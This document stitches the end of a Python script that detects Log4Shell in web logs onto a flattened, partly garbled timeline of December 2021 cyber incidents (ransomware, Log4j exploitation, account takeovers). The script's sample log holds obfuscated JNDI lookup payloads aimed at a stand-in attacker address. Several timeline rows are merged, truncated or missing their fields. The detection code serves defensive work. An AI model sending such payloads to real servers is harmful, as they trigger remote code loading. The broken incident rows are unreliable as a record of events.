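203.0.113.9 - - [10/Dec/2021:14:04:02 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.12 - - [10/Dec/2021:14:05:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7/x}"
203.0.113.12 - - [10/Dec/2021:14:05:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/y}"
203.0.113.14 - - [10/Dec/2021:14:06:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:${env:NOPE:-l}dap://198.51.100.7/z}"
"""

# Innermost ${...} lookup, i.e. one with no further ${ inside it.
INNER_LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
# Normalised form we finally look for; the scheme list covers the JNDI
# providers an attacker can reach (ldap/ldaps/rmi/dns/iiop/corba/nds/http).
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|http)\s*:[^}]*\}", re.IGNORECASE
)


def _resolve_inner(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would, for the forms
    attackers use to hide the string 'jndi':
      ${lower:X} / ${upper:X}  -> case change of X
      ${name:-default}         -> 'default' (name is chosen to be undefined)
    Anything else (jndi:, date:, ...) is left untouched."""
    body = m.group(1)
    default_at = body.find(":-")
    if default_at != -1:
        return body[default_at + 2:]
    func, sep, arg = body.partition(":")
    if sep:
        func = func.strip().lower()
        if func == "lower":
            return arg.lower()
        if func == "upper":
            return arg.upper()
    return m.group(0)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode and collapse nested lookups until nothing changes.
    max_rounds bounds the work an adversarial input can cause."""
    for _ in range(max_rounds):
        resolved = INNER_LOOKUP_RE.sub(_resolve_inner, unquote(text))
        if resolved == text:
            break
        text = resolved
    return text


def scan_log(log_text: str) -> list[dict]:
    """Return one finding per JNDI lookup found in the log, with the client IP
    (first field of the combined log format) and the normalised lookup."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        for m in JNDI_RE.finditer(normalize(line)):
            findings.append({"ip": line.split()[0], "lookup": m.group(0)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['lookup']}")
```

Because the normaliser only emulates the lookup types that produce text, it is safe to run on untrusted log data; it never performs a JNDI resolution itself. Feed it the logs of every Java-fronted service, not only the web tier, since the lookup fires wherever the string is eventually logged.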
84
10/12/2021
During Q3 2021
During Q3 2021
Karakurt
Over 40 victims worldwide
Researchers from Accenture reveal the details of Karakurt, a financially motivated threat actor, primarily using VPN credentials to gain initial access to a victim's network.
Account Takeover
Multiple Industries
CC
>1
Accenture, Karakurt
85
10/12/2021
Since November 2021
-
Conti
Multiple organizations in Australia
The Australian Cyber Security Centre (ACSC) says Conti ransomware attacks have targeted multiple Australian organizations from various industry verticals.
Malware
Multiple Industries
CC
AU
Conti, Ransomware, Australian Cyber Security Centre, ACSC
86
10/12/2021
"Recently"
-
Agent Tesla
Users in Korea
Researchers from Fortinet discover a new variant of the Agent Tesla malware distributed in an ongoing phishing campaign that relies on Microsoft PowerPoint documents laced with malicious macro code.
Malware
Individual
CC
KR
Fortinet, Agent Tesla
87
10/12/2021
9/12/2021
9/12/2021
RansomEXX
Hellmann Worldwide Logistics
German logistics provider Hellmann Worldwide Logistics is hit with a ransomware attack.
Malware
Transportation and storage
CC
DE
Hellmann Worldwide Logistics, RansomEXX, ransomware
The Python Package Index (PyPI) registry removes three malicious Python packages (aws-login0tool, dpp-client, dpp-client1234) aimed at exfiltrating environment variables and dropping trojans on the infected machines. The malicious packages are estimated to have generated over 10,000 downloads.
98
13/12/2021
11/12/2021
11/12/2021
?
UKG
Workforce management solutions provider UKG (Kronos) discloses that it suffered a ransomware attack.
Malware
Professional, scientific and technical
CC
US
Kronos, UKG, ransomware
99
13/12/2021
-
-
TinyNuke
Corporate addresses and individuals working in manufacturing, technology, construction, and business services in France
Researchers from Proofpoint discover a new campaign distributing the info-stealing malware TinyNuke, and targeting French users with invoice-themed lures.
Malware
Multiple Industries
CC
FR
Proofpoint, TinyNuke
100
13/12/2021
-
-
?
Chrome users
Google releases Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.
CVE-2021-4102 Vulnerability
Unknown
CC
N/A
Google, Chrome 96.0.4664, CVE-2021-4102
101
13/12/2021
12/12/2021
12/12/2021
?
Indian Prime Minister Narendra Modi's Twitter account
Indian Prime Minister Narendra Modi's Twitter account is hacked with a message declaring his country had adopted bitcoin as legal tender and was distributing the cryptocurrency to citizens.
Account Takeover
Individual
CC
IN
Narendra Modi, Twitter
102
13/12/2021
6/12/2021
6/12/2021
?
Shelley School District
The Shelley School District is the victim of a ransomware attack.
Malware
Education
CC
US
Shelley School District, ransomware
103
13/12/2021
12/11/2021
-
?
ScansStat Technologies
ScansStat Technologies discloses that bad actors posing as pharmacies tricked it into sending them patient information.
Account Takeover
Professional, scientific and technical
CC
US
ScansStat Technologies
104
13/12/2021
10/12/2021
10/12/2021
?
City of Lexington
The city of Lexington takes the majority of its Internet-connected services offline after discovering an "external interference."
Unknown
Public admin and defence, social security
CC
US
City of Lexington
105
13/12/2021
-
-
TellYouThePass
Windows and Linux devices
Threat actors revive an old and relatively inactive ransomware family known as TellYouThePass, deploying it against Windows and Linux devices by exploiting the critical remote code execution bug in the Apache Log4j library.
Malware
Multiple Industries
CC
>1
TellYouThePass, ransomware, Apache Log4j, CVE-2021-44228, Log4Shell
106
13/12/2021
-
-
?
VulcanForged
VulcanForged, a cryptocurrency gaming company, is hit by hackers who steal more than $400 million.
Unknown
Fintech
CC
N/A
VulcanForged
107
14/12/2021
-
-
Threat actors originating from China, Iran, North Korea, and Turkey
Multiple organizations
Researchers from Microsoft reveal that nation-state attackers are now trying to exploit the Log4Shell vulnerability.
CVE-2021-44228 Vulnerability
Multiple Industries
CE
>1
Apache Log4j, CVE-2021-44228, Log4Shell
108
14/12/2021
Early December 2021
Early December 2021
?
Behavioral Health Group
Opioid treatment network Behavioral Health Group suffered a cyberattack that led to an almost week-long disruption of IT systems and patient care.
Unknown
Human health and social work
CC
US
Behavioral Health Group
109
14/12/2021
-
-
Anubis
Mobile banking users
Researchers from Lookout discover a new Anubis campaign targeting the customers of nearly 400 financial institutions.
Malware
Finance and insurance
CC
>1
Lookout, Anubis
110
14/12/2021
Since April 2021
-
?
Servers in Malaysia, Mongolia, Indonesia, and the Philippines.
Researchers from Kaspersky reveal the details of Owowa, a malicious IIS web server module on Microsoft Exchange Outlook Web Access servers, used to steal credentials and execute commands on the server remotely.
Malicious OWA Module
Multiple Industries
CC
>1
Kaspersky, Owowa, IIS, Microsoft Exchange, Outlook Web Access
111
14/12/2021
Over the past six months
-
MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros)
Telecommunication and IT service providers in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos
Researchers from Symantec reveal the details of the latest campaign of the Iranian backed Seedworm group.
Researchers from Prevailion identify DarkWatchman, a new malicious javascript-based Remote Access Trojan (RAT).
Malware
Multiple Industries
CC
RU
Prevailion, DarkWatchman
113
14/12/2021
-
-
Multiple threat actors
Undisclosed organizations
Microsoft releases 67 security fixes including seven critical issues and a zero-day flaw (CVE-2021-43890) being actively exploited by cybercriminals.
CVE-2021-43890 vulnerability
Unknown
N/A
N/A
CVE-2021-43890, Microsoft
114
14/12/2021
12/12/2021
12/12/2021
?
Superior Plus
Major natural gas supplier Superior Plus announces that it is suffering from a ransomware attack.
Malware
Electricity, gas steam, air conditioning
CC
US
Superior Plus, Ransomware
115
14/12/2021
12/12/2021
12/12/2021
?
Virginia’s Division of Legislative Automated Systems
Virginia’s Division of Legislative Automated Systems is hit with a ransomware attack.
Malware
Professional, scientific and technical
CC
US
Virginia’s Division of Legislative Automated Systems, ransomware
116
14/12/2021
13/12/2021
13/12/2021
?
Brazil's Ministry of Health (MoH)
The Brazil's Ministry of Health (MoH) suffers a second cyber attack.
Unknown
Human health and social work
CC
BR
Brazil's Ministry of Health, MoH
117
14/12/2021
Since July 2020
-
Earth Centaur, previously known as Tropic Trooper
Transportation and government agencies
Researchers from Trend Micro reveal a resurgence of attacks carried out by the Earth Centaur threat actor.
Targeted Attack
Multiple Industries
CE
>1
Earth Centaur, Tropic Trooper, Trend Micro
118
14/12/2021
-
-
?
Eastern Health
Eastern Health suffers a cyber attack.
Unknown
Human health and social work
CC
US
Eastern Health
119
14/12/2021
14/12/2021
14/12/2021
?
North Shore Hebrew Academy High School
The North Shore Hebrew Academy High School is defaced with Nazi images.
Defacement
Education
CC
US
North Shore Hebrew Academy High School
120
15/12/2021
Since 2019
-
MERCURY (aka MuddyWater, SeedWorm, or TEMP.Zagros)
Unnamed Asian airline
Researchers from IBM X-Force reveal that the MuddyWater group is deploying a newly discovered backdoor named 'Aclip' that abuses the Slack API for covert communications, targeting an unnamed Asian airline.
Portland brewery and hotel chain McMenamins suffers a Conti ransomware attack that disrupts the company's operations.
Malware
Accommodation and food service
CC
US
McMenamins, Conti, ransomware
122
15/12/2021
15/12/2021
15/12/2021
Emotet
Multiple organizations
A new wave of Emotet attacks drop the Cobalt Strike beacons for faster attacks.
Malware
Multiple Industries
CC
>1
Emotet, Cobalt Strike
123
15/12/2021
-
-
?
Multiple organizations
Researchers from Juniper reveal that threat actors exploiting the Apache Log4j vulnerability are switching from LDAP callback URLs to RMI to inject Monero miners.
Researchers from Check Point reveal that the Iran-linked hacking group Charming Kitten attacked seven Israeli targets including the Israeli "government and business sector".
Unknown
Multiple Industries
CW
IL
Check Point, Charming Kitten
125
15/12/2021
01/04/2021
01/11/2021
?
Pro Wrestling Tees
Popular wrestling t-shirt site Pro Wrestling Tees discloses a data breach incident that has resulted in the compromise of the financial details of tens of thousands of its customers.
Unknown
Arts entertainment, recreation
CC
US
Pro Wrestling Tees
126
15/12/2021
Between April and June 2019
-
?
Regional Cancer Care Associates (RCCA)
Regional Cancer Care Associates has some employee email compromised in a phishing attack.
Account Takeover
Human health and social work
CC
US
Regional Cancer Care Associates, RCCA
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
BREACHOMETER
The “Breachometer” compares the current number of events/day with the max and min values recorded in the previous 12 months.